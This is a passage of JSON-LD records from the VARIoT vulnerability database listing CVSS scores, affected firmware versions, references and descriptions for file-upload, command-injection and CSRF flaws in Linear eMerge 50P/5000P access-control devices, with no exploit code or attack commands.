                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158703",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7268",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7268",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34615",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-095",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158703",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P devices allow Unauthenticated File Upload. Linear eMerge 50P/5000P The device contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. An attacker could use this vulnerability to upload a file with an arbitrary extension to a directory in the application\u0027s Web root directory and execute the uploaded file with the permissions of the Web server",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7268",
            "trust": 3.1
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-184-01",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "155250",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2294",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47610",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "id": "VAR-201907-0169",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:23:40.542000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-434",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7268"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.7,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7268"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47610"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "date": "2019-07-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "date": "2019-07-02T17:15:12.257000",
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "date": "2020-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158703"
          },
          {
            "date": "2019-07-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "date": "2022-10-13T19:52:07.833000",
            "db": "NVD",
            "id": "CVE-2019-7268"
          },
          {
            "date": "2020-08-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P Device unrestricted upload vulnerability type file vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0170

    Vulnerability from variot - Updated: 2023-12-18 13:23

    Linear eMerge 50P/5000P devices allow Authenticated Command Injection with root Code Execution. Linear eMerge 50P/5000P The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0170",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm,Sipke Mellema",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7269",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7269",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158704",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7269",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7269",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-094",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158704",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P devices allow Authenticated Command Injection with root Code Execution. Linear eMerge 50P/5000P The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7269",
            "trust": 2.5
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-184-01",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "155250",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094",
            "trust": 0.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2294",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47608",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47624",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158704",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "id": "VAR-201907-0170",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2023-12-18T13:23:40.517000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.7,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7269"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7269"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47624"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47608"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "date": "2019-07-02T17:15:12.320000",
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158704"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          },
          {
            "date": "2022-10-13T19:54:47.307000",
            "db": "NVD",
            "id": "CVE-2019-7269"
          },
          {
            "date": "2020-08-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P In the device  OS Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006015"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-094"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0171

    Vulnerability from variot - Updated: 2023-12-18 13:23

    Linear eMerge 50P/5000P devices allow Cross-Site Request Forgery (CSRF). Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
